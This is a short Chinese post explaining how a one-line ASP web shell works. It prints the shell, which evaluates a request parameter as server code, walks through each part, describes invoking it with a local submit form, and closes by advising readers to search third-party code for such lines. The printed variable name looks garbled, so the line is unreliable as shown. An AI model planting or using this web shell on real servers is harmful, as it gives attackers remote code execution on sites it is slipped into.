常有人问什么是一句话木马,看下面这句。就是
<%25885AA=REquEst("PA"):EvaL(25885AA)%>
解释一下:
25885AA=REquEst("PA")
这句就是一个变量25885AA获得一个值,别被大小写搞花眼,你全改成小写就是request("pa")。
EvaL(25885AA)
这句就是把25885AA的值作为ASP代码来执行,等同支ASP的exec。
:
这是ASP两句的分隔符。一句分成两句来。
这样大家明白了吧。
调用时只要在本地做一个提交口,把ASP代码复制进去提交。就执行了ASP程序了。
大家在用别人程序时,先用DW查找一下整个程序有没有这些代码。